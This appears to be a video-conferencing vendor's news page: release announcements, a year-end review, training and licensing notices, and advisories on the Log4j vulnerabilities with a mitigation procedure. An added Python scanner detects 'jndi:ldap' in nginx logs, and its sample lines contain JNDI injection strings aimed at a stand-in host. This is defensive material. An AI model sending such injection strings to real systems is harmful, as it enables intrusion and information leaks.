VQ Conference Manager 3.9 Released

VQ Conference Manager 3.9 released mid-January and takes us forward in a number of key areas:

  1. One-Button-To-Push (“OBTP”). OBTP is something customers love and it’s been on our “to-do” list for a long time. OBTP follows on from Recurring Meetings and the public API; we now offer 3 of the key TMS features that will enable customers to migrate away from TMS.
  2. Pane Placement/Layout management. Key for concierge services, Pane Placement allows the positioning of participants in specific video panes.
  3. We’ve completely restructured the reporting dashboards with a very contemporary looking, clean, update. We’re particularly pleased with how visual they are; a lot of information is conveyed quickly and easily. Customer feedback from during the development process was incredibly positive. Not only do they look great, they’re also blistering quick. A lot of backwards and forwards took place between our engineering team and the engineers at Elastic. The results are stunning.

Watch our VQCM 3.9 Release Webinar here

VQ Conference Manager 3.9 is exciting because it adds some great new features. In my mind, however, it’s even more exciting because it’s the next step in a sequence that concludes with a full set of TMS replacement functionality. At VQCM 3.10 (April, 2022 time-frame), we add TMS style Directory Services and at VQCM 3.11, we’ll add device management (device configuration templates). 

The excitement is therefore that things are slowly but surely dropping into place and customers will have a secure, scalable, solution that enables them to deliver video conferencing services with end-to-end control. All based on best of breed, modern, software technology and components.

If that wasn’t brilliant enough, a lot of hard work in 2021 means the following are now just below the surface:

  • A JITC compliant version of VQCM based on Red Hat Enterprise Linux (RHEL) 8.5. This is due to go into US DOD cyber scan testing in Q1 2022. The first version will be single node but HA will follow on.
  • A multi-language capable end-user centric user interface.
  • Something called “Call Gate” and “Identity Assured Participants”. We’re about to demo the concept for the first time. If you think it sounds interesting, let us know and we can do private demos. If you’d like to take a guess of what it is, we’ll give* VQ Sweatshirts for the most accurate or interesting answers.

That just leaves this small thing called the Cloud. As 2022 unfolds, we plan to “unleash the beast” and rather than run VQCM under Kubernetes in a VM on VMware, we’ll take VQ and run it under Kubernetes natively on a cloud service such as AWS. We ran the concept last year and it was surprisingly painless. Our focus then switched to the RHEL version of VQCM. The plan is to repeat the process and take the RHEL version of VQCM, run the playbooks and have it alive and kicking under AWS. “Look, no-hands” or more importantly, no VMware. Anybody interested in running a secure version of VQCM on, for example, a secure Cloud? Answers on a postcard please.

Looking forward to a great 2022

Mike

* Limited Supply. Allocated in an entirely arbitrary manner.

VQ’s 2021 End of Year Review

I’m incredibly pleased with what we’ve achieved in 2021.

The product goes from strength to strength; big things this year include recurring meetings, active speaker and coming in January, pane placement, one-button-to-push (“OBTP”) and next generation Kibana dashboards. Each of them is a big engineering effort and fantastic to have finally delivered; it’s felt like they’ve been on the roadmap for a long time. Our investment on the platform is really paying off; the velocity at which we can include new functionality has increased and a lot of it is down to architectural changes and new API laid down over the last couple of years.

Active speaker

Pane placement

One-button-to-push (“OBTP”)

Next generation Kibana dashboards

An area I’m really pleased with is our product development process. We’ve invested heavily in it over the last 18 months and the results are really impressive. I can’t say it was easy and in the early stages we had some really difficult meetings; the good news is we worked through the challenges and the combination of platform architectural work and new process is yielding tremendous results. I should also say that we have a general principle of being “light on process”; process is good but too much process can become a real burden and massively detrimental.

The addition of Recurring Meetings scheduling is allowing customers to migrate their scheduling off TMS. Customers are starting to adopt the API; we’re seeing the first signs of life in terms of integrations (scheduling and work-flow-automation).

Our Cisco and partner relationships are working really well. The progress we’ve made clearing the roadmap backlog of “big things” means we’re able to spend more time working with the Cisco teams and aligning VQ with CMS. It feels like that is working really well and we’re excited about some of the things it’ll enable.

Underpinning everything is great people. We have a phenomenal team at VQ; we added some great new people at the back end of last year and I’m really pleased to say we have more joining us in January. The ‘team’ is broader than VQ; we work closely with Cisco, our partners and customers. It never ceases to amaze me how fortunate we are to be able to work with such a collection of “can do”/“make it happen” people and organizations. The collective results are amazing.

Behind the scenes, we’ve been working on US Defence Department approval. That’s a long, tough, process but at about 15 months into it, we’re heading towards completion. If you hear a loud “whoop”, you’ll know we finally did it.

That leads us to next year; we’ve got some great stuff coming your way. Our TMS replacement (Directory Services and Device Management & Automation) offering will start to appear early Q2. Key enablers are going in now that will see our scalability grow substantially as we progress thru 2022 which, in turn, allow a “whole pile of goodness” at the user interface level and user self-service functionality. We’re jazzed.

With that, I’d like to thank you again for working with VQ. Have a great Christmas/Holiday and New Year and we look forward to working with you in 2022.

Regards

Mike

VQ Advisory. December 15, 2021: CVE-2021-44228 status update

Following the recent critical CVE issue with Log4j (https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44228), a second, lower severity CVE was made public on December 14, 2021 (https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-45046). This second CVE is not mitigated by the previously provided mitigation script. However, it is important to note that this is a separate issue to the one initially disclosed and has a much lower severity rating at the current moment.

Current advice from Elasticsearch (ES) regarding this new CVE and the mitigation previously provided indicates that it will still protect users against information leaks:

“Update 15 December: A further vulnerability (CVE-2021-45046) was disclosed on December 14th after it was found that the fix to address CVE-2021-44228 in Apache Log4j 2.15.0 was incomplete in certain non-default configurations. Our guidance for Elasticsearch and Logstash are unchanged by this new vulnerability and we are currently working to assess other products in order to provide a clear statement.”

It is also worth noting that:

Details on Elasticsearch information leakage

The information leakage vulnerability in Log4j enables an attacker to exfiltrate certain environmental data via DNS – it does not permit access to data within the Elasticsearch cluster. The data that can be leaked is limited to those available via Log4j “lookups”, which includes system environment variables and a limited set of environmental data from other sources.


(https://discuss.elastic.co/t/apache-log4j2-remote-code-execution-rce-vulnerability-cve-2021-44228-esa-2021-31/291476)

The threat from the Denial of Service (DoS) that this new CVE presents can’t yet be fully dismissed. However early reports of testing this attack vector have indicated that it has a lower impact and is considered a limited DoS:

“However, in our testing we did not find this DOS to be resource consuming as it seemed that the infinite loop created by recursively resolving ${ctx:apiversion} was identified by the program and errored out.” – https://www.lunasec.io/docs/blog/log4j-zero-day-update-on-cve-2021-45046/

Here at VQ Communications we are actively monitoring the situation and incoming CVEs. As many security analysts are predicting that this situation is far from finished developing, we continue to advise caution in exposing your VQCM virtual machines and APIs to the public internet. There is every chance that more details regarding these CVEs, and as yet undisclosed issues, will surface in the coming days or weeks. We advise a defensive posture until such point as customers can upgrade to the 3.9 release of VQCM (due January 17, 2022).

The following posts provide additional background information:

https://www.lunasec.io/docs/blog/log4j-zero-day-update-on-cve-2021-45046/

https://discuss.elastic.co/t/apache-log4j2-remote-code-execution-rce-vulnerability-cve-2021-44228-esa-2021-31/291476

https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44228

Summary:

1. The guidance from Elastic remains that the mitigation outlined in our mail yesterday still holds for the information leak. Apply the mitigation script if you haven’t already. When VQCM 3.9 becomes available in January (target Jan 17, 2022), update to VQCM 3.9.

2. Minimize public internet exposure wherever possible. If you do need to expose a public service, ensure only HTTPS ports are open and use a reverse proxy or equivalent.

We have added a link on the home page of vqcomms.com; it links to the latest status and all of our posts related to this CVE. 

The Mitigation Script and guidance to using it can be found here:

  • Navigate to the https://www.vqcomms.com/resources/ page, log in and download the “log4j2-cve.zip” file from the “CVE-2021-44228 Mitigation Script” category. A User Guide can also be downloaded.

regards

The VQ Team

VQCM update on CVE-2021-44228: analysis results and mitigation script.

Yesterday morning, December 13, 2021, we issued a security advisory regarding a critical severity CVE that impacted an Apache library (Log4j 2) and anything which used this. This includes Elasticsearch (ES). Elasticsearch is a component within VQ Conference Manager.

We got to work in-house testing to better understand the issue, its implications and the impact it has on VQCM VMs. One of the conclusions from this analysis and testing was that it would be non-trivial for the CVE to be successfully exploited because of VQCM’s logging architecture. Especially for an external facing attacker.

Whilst this gives a degree of assurance, we strongly recommend customers apply a mitigation script we have created. The script follows mitigation advice from Elasticsearch. Details of how to get the script and how to run it can be found below.

In addition, Elasticsearch will be producing a new version of Elasticsearch (7.16.1) which removes the affected module. VQCM 3.9 is due mid-January and will contain Elasticsearch 7.16.1.

Our guidance is:

  • Download and apply the mitigation script as soon as possible.
  • Plan on upgrading to VQCM 3.9 in January (due 1/17/2022)
  • Minimize public internet exposure wherever possible. If you do need to expose a public service, ensure only HTTPS ports are open and use a reverse proxy or equivalent.

Downloading and installing the mitigation script

Please note this script will bring the system down, so it is recommended to be run out of working hours. 

  • Navigate to the https://www.vqcomms.com/resources/ page, log in and download the “log4j2-cve.zip” file from the “CVE-2021-44228 Mitigation Script” category.
  • Enable SSH from the CM-Admin page (port 1234) under the “Start / Manage / SSH Access” section, and create an SSH user if you don’t already have one (Note: SSH is enabled if the button shows “Disable SSH access”).
  • Using WinSCP or SCP, copy the “log4j2-cve.zip” file on the VQCM Virtual Machine (VM), under the home directory of your SSH user.
  • Open an SSH session using Putty (or similar tool) with the VQCM VM, authenticating with the same SSH user.
  • Run the following commands:
    • unzip log4j2-cve.zip
    • chmod +x log4j2-cve.sh
    • sudo ./log4j2-cve.sh
  • This command will ask you for your password to escalate privileges; it is the password of the SSH user you are logged in as.
  • The tool will run for a moment (10-15 mins, could be more depending on how much data your system has). If it runs successfully to the end, it will output “SUCCESS the mitigation has been applied”:

PLAY RECAP **********************************************************************************************************************************************************************************************************************************************************************************************************************

localhost                  : ok=13   changed=7    unreachable=0    failed=0    skipped=8    rescued=0    ignored=0

All pods are running, exiting

usename

----------

postgres

(1 row)

ALTER ROLE

~~~

SUCCESS the migitation has been applied

~~~

If you see the SUCCESS message, the mitigation has been applied successfully. If you see the “ERROR the mitigation was NOT applied” message, please contact VQ support at support@vqcomms.com, with as much information as possible.

Which versions of VQ can I use the mitigation script with? 

Versions 3.6, 3.7 and 3.8; please run the mitigation script.

For 3.x versions 3.5 and below, please contact support@vqcomms.com.

Regards

The VQ team

VQ Security advisory for Log4J2 CVE (CVE-2021-44228)

Over the weekend, a critical security issue which impacts Log4j2 (CVE-2021-44228), and all products which use it as a dependency, became public. This is a significant and critical level CVE and needs to be treated as such by any company which is even potentially impacted. As the VQCM virtual machine uses Elasticsearch (ES) for logging, this issue impacts our products (Kibana is currently listed as not impacted). Due to the nature of the vulnerability and the extensive logging that VQCM provides, any publicly exposed component of VQCM becomes a potential attack surface. This includes the VQCM API / UI, as even a failed login can be used as a crafted log message to carry out an attack against the underlying ES logging.

By default, our product firewall settings block access to the ES port and we recommend that this port is blocked if you have previously opened it. If you have made your VQCM API / UI publicly accessible we recommend removing this public access by placing it behind your own firewall(s) or stopping the exposed service / route.

It is important to note that, as per current Elasticsearch security announcements, ES is not at risk of a Remote Code Execution attack, however it is still at risk of information leak.

As such we strongly advise all customers to immediately block publicly exposed elements of the VQCM instance. We are currently working on a mitigation (seen here – https://www.elastic.co/guide/en/elasticsearch/reference/7.16/advanced-configuration.html#set-jvm-options) for this issue following security announcements from Elasticsearch themselves which we are hoping to get out to customers as soon as we have finished in house security testing. The up-and-coming release of 3.9 (expected release date 17/01/2022) will include a fixed version of the Elasticsearch instance. 

Customers who are concerned and want to make sure their instance has not been impacted should check their web traffic logs (nginx) for the following keyword(s) “jndi:ldap”. If customers are unsure on how to do this, please carry out a log dump and make it available to us via our support team. Customers finding positive hits for this will need to assume that there has been an information leak from their VQCM instance and should take appropriate action.

Our support team is on hand for customers who wish to discuss this and would like additional information or help. 

Regards,

Mike Horsley 
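
The nginx log check recommended in the advisory above (searching web traffic logs for “jndi:ldap”), as an added example that is not part of the VQ advisory or VQ's own tooling. It goes slightly beyond a literal keyword search by matching case-insensitively and after percent-decoding; the nginx "combined" log format and the sample lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import unquote

# nginx default "combined" access-log format (assumption: the page does not
# state which log_format a VQCM deployment uses; adjust the pattern if needed).
COMBINED = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<request>[^"]*)" (?P<status>\d{3}) \S+ '
    r'"(?P<referer>[^"]*)" "(?P<agent>[^"]*)"'
)
KEYWORD = "jndi:ldap"  # the keyword named in the advisory


def normalise(value, max_rounds=3):
    """Percent-decode repeatedly (covers double encoding), then lower-case."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value.lower()


def scan_line(line):
    """Return a hit record if the keyword appears in a logged field, else None."""
    m = COMBINED.match(line)
    if m is None:
        # Unparseable line: check the whole line so nothing is silently skipped.
        if KEYWORD in normalise(line):
            return {"ip": None, "time": None, "status": None, "fields": ["raw"]}
        return None
    fields = [f for f in ("request", "referer", "agent")
              if KEYWORD in normalise(m.group(f))]
    if not fields:
        return None
    return {"ip": m["ip"], "time": m["time"],
            "status": int(m["status"]), "fields": fields}


def scan_log(lines):
    """Scan an iterable of log lines; return hits tagged with 1-based line numbers."""
    hits = []
    for number, line in enumerate(lines, 1):
        hit = scan_line(line.rstrip("\n"))
        if hit is not None:
            hit["line"] = number
            hits.append(hit)
    return hits


# Constructed sample lines (documentation IP ranges, .invalid hostname).
SAMPLE = [
    '192.0.2.10 - - [13/Dec/2021:09:14:02 +0000] "GET /api/v1/ HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [13/Dec/2021:09:15:40 +0000] "POST /login HTTP/1.1" 401 128 "-" "${jndi:ldap://example.invalid/a}"',
    '203.0.113.5 - - [13/Dec/2021:09:16:11 +0000] "GET /?q=%24%7BJNDI%3ALDAP%3A%2F%2Fexample.invalid%2Fa%7D HTTP/1.1" 404 0 "-" "curl/7.79.1"',
    '203.0.113.5 - - [13/Dec/2021:09:16:12 +0000] "GET /?q=%2524%257Bjndi%253Aldap%253A%252F%252Fexample.invalid%257D HTTP/1.1" 404 0 "-" "curl/7.79.1"',
]

if __name__ == "__main__":
    for hit in scan_log(SAMPLE):
        print(f"line {hit['line']}: {hit['ip']} [{hit['time']}] "
              f"status={hit['status']} matched in {', '.join(hit['fields'])}")
```

A hit on a request that returned 401 or 404 still counts: the advisory notes that even a failed login can carry a crafted log message, so the response status does not clear the entry.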

Introducing VQ Conference Manager 3.8

Here we are about to press the ‘go’ button again on a new VQ Conference Manager release.

VQ Conference Manager 3.8 is very personal for me. We finally got to the point where we addressed some of my personal pet peeves. I’m delighted to say I’m really pleased with how it looks.

Let’s start with what customers are asking for: a solution that enables them to deliver conferencing services on CMS (call quality/experience, interoperability, scale and media security) that gives a user experience similar to the cloud based offerings. TMS customers are looking for a TMS replacement that addresses their OBTP, Directory Services and Device Management needs.

Then let’s throw in my pet peeves:

1. It was difficult to find a soft client that worked consistently and well. There was also the challenge that we wanted to use one that we knew all our customers could use. We really needed a great soft client that shipped with every CMS that didn’t rely on a cloud based service.

2. It was too difficult to share join details with the people I wanted to have calls with. It was embarrassing how many times I had people ask me to send them the details for their space/meeting so the people they wanted to meet could join their call.

VQ Conference Manager 3.8.0 and CMS 3.3 come together really nicely. Add Expressway with MRA and Web App works incredibly well; it gives us a client that ships with every CMS and VQCM’s new “Home” coApp makes it really easy to get the join details for a Space or Meeting. From the VQ UI, you can click Join for click to call ‘ease of join’. Sharing the details is a breeze; preview them or simply copy them and paste them into a mail, slack or meeting appointment.

What I really like is that in about 4 clicks, I can get the details for a Role on a Space (or meeting), copy and paste it into an email, send it out to people and then have them join from wherever they are – room system, soft client or out on the road, from their iPhone. It’s especially satisfying joining a call either via the Web App or Webex client from my phone – I still have that sense of disbelief how good the video is and I can do it from wherever I have Wi-Fi or 4G.

The results are sensational. I’m completely sold and have been loving the experience.

Activity got a pretty major rework and looks really good for it. Active Speaker now works across all call types. Recurring Meetings got some love and now support irregular patterns and a selectable end date (how did we miss that the first time around)?

Other ‘make my life easier’ functionality includes the addition of Local Users for those of us without AD/LDAP.

On the theme of ‘make my life easier’ – system installers will love the certificate management changes now in CM-Admin. Trusted certs, cert chain editor along with issuer labels and the ability to paste certs. Ansible playbooks start to appear with CMS backup playbooks and one for CMS certificate renewal.

VQ Conference Manager 3.8.0 paves the way for two follow-on releases:

  • VQCM 3.8.1 adds Pane Placement and more filtering of Meeting Lists (e.g., relative dates)
  • VQCM 3.8+ adds One Button To Push.

VQCM 3.8.1 is currently planned for the January 2022 time frame; VQCM 3.8+ will be made available as an update to VQCM 3.8.0. No dates yet for 3.8+; we’re hoping sooner rather than later.

For all the details, please read the release notes available from the vqcomms.com (Menu->VQ conference Manager->release notes).

We’re really pleased with how it looks and we hope you like it too.

Keep up to date with the latest VQ news, join our ‘Ask VQ’ Webex Space

VQ Conference Manager Training Milestone

Here at VQ we’ve just passed another milestone as our 200th person has completed our VQ Conference Manager certified training programmes.

Developed and delivered by our training partner, Scott Waschler, of TEKnowLogical Solutions, 2 hands-on training programmes are offered:

VQ Conference Manager Concierge and Call Management Certification (2 days)

For unified communications and help-desk engineers who are responsible for providing scheduling and trouble resolution to organizations using VQ Conference Manager, concentrating on after-deployment operations management.

VQ Conference Manager Deployment and System Administration Certification (3 days)

For unified communications and network engineers who are responsible for installing, configuring, and trouble resolution of VQ Conference Manager, concentrating on deployment and initial configuration of VQ Conference Manager.

Both can be ordered through Cisco’s GPL via CCW:

But why would you take time out of a busy schedule to take the courses? Here’s what a few recent attendees have said:

“Scott is an excellent instructor and always pauses at the right places to see if there are any questions and then move on. Course was paced properly and was all around enjoyable.”

“The training was excellent. Real kudos to the instructor, Scott, for breaking down a lot of detailed info for us.”

“Scott, our instructor, really knows his stuff…and did an excellent job of breaking it down into understandable chunks (a skill not every instructor has).”

So, if you’re interested in VQ Conference Manager, find out more at https://www.vqcomms.com/training/, speak to us on our ‘Ask VQ’ Webex Space or email us at info@vqcomms.com


VQ Conference Manager 3.7 Released

VQCM 3.7 is now available to download and we think you’ll like it.

Here’s what’s new…

  • Active Speaker indications for Scheduled Meetings
  • People in Lobby indicators
  • Meeting List filters
  • Duplication/Cloning of LDAP Configs, UX Profiles, Space Templates, Email Templates
  • Automatic Gain Control on Space Template Roles
  • System use Terms and Conditions pre-login message
  • Refinements to Elasticsearch data collection for CMS syslogs and Expressway syslogs, call data records and metric data; early adopter program extended
  • Public API early adopter program
  • Ansible CMS provisioning automation early adopter program

The API, Ansible CMS Provisioning and expanded Elasticsearch data collection from CMS/Expressway features are examples of how VQ starts to evolve into becoming a platform for UC solutions; more is coming and we’re very pleased to be making the first steps.

For the details, please see the vqcomms.com customer portal under knowledge base/release notes.

For customers wary of updating to the latest 3.7 release, now’s a good time to consider updating to VQCM 3.6.1. It’s been in the field now for about 3 months and is performing extremely well.

If you would like to be part of one of our early adopter programs, please email support@vqcomms.com

Please contact support@vqcomms.com to arrange installs or upgrades.

End-of-Sale Perpetual License Model Announcement


Overview

VQ Communications Ltd announces the end-of-sale and end-of-life dates for the VQ Conference Manager perpetual license model. The last day to order the affected product(s) is 1 May 2021. Customers with active service contracts will continue to receive support from the VQ Support as shown in Table 1 which describes the end-of-life milestones, definitions, and dates for the affected product(s). Table 2 lists the product part numbers affected by this announcement.

For customers with active and paid VQ Conference Manager Perpetual License service and support contracts, support will continue under the terms and conditions of the customer’s existing service contract and may be extended. This announcement only affects new customers.

End-of-life milestones

Table 1.           End-of-life milestones and dates for the VQ Perpetual License model

| Milestone | Definition | Date |
| --- | --- | --- |
| End-of-Life Announcement Date | The date the document that announces the end-of-sale and end-of-life of a product is distributed to the general public. | 1st May 2021 |
| End-of-Sale Date: App SW | The last date to order the VQ Conference Manager perpetual license. The product is no longer for sale after this date. | July 31, 2021 |
| Last Ship Date: Software Support | The last-possible ship date that can be requested. Actual ship date is dependent on lead time. | July 31, 2021 |
| End of SW Maintenance Releases Date: App SW | The last date that VQ Engineering may release any final software maintenance releases or bug fixes. After this date, VQ Engineering will no longer develop, repair, maintain, or test the product software. | Not affected |
| End of New Service Attachment Date: App SW | For software that is not covered by a service-and-support contract, this is the last date to order a new service-and-support contract or add the software to an existing service-and-support contract. | July 31, 2021 |
 

Product part numbers

Table 2.           Product part numbers affected by this announcement

| Part Number | Product Description | Replacement Product Part Number | Replacement Product Description |
| --- | --- | --- | --- |
| VQConfAdvPMP | VQ Conference Manager Perpetual License for Cisco PMP+ | VQ-LIC-PMP | VQ Conference Manager license per Cisco PMP+ |
| VQConfAdvSMP | VQ Conference Manager Perpetual License for Cisco SMP+ | VQ-LIC-PMP | VQ Conference Manager license per Cisco SMP+ |
| VQAdd-in | VQ Conference Manager Perpetual License for either Outlook Add-in | VQ-LIC-1SSA | Single App, either Outlook Add-in, Jabber Extension or iOS |
| VQiOS | VQ Conference Manager Perpetual License for iOS | VQ-LIC-1SSA | Single App, either Outlook Add-in, Jabber Extension or iOS |
| VQUAPBundle | VQ Conference Manager Perpetual License for all Apps | VQ-LIC-SSAP | Apps Pack per knowledge worker – Outlook Add-in, Plug in, iOS phone app |
| AdvAnalytics | VQ Conference Manager Perpetual License for Advanced Analytics | VQ-OPT-ES | Annual Elastic Subscription per Elastic Data node |
| VQConfAdvMaint-1yr | VQ Conference Manager Perpetual License Annual Support – 1 yr | Replaced by VQ Subscription license model | |
| VQConfAdvMaint-2for3yr | VQ Conference Manager Perpetual License Annual Support – Special Offer – Pay for 2 years get 3 | Replaced by VQ Subscription license model | |
| VQConfAdvMaint-3yr | VQ Conference Manager Perpetual License Annual Support – 3 yr | Replaced by VQ Subscription license model | |
| VQConfAdvMaint-5yr | VQ Conference Manager Perpetual License Annual Support – 5 yr | Replaced by VQ Subscription license model | |
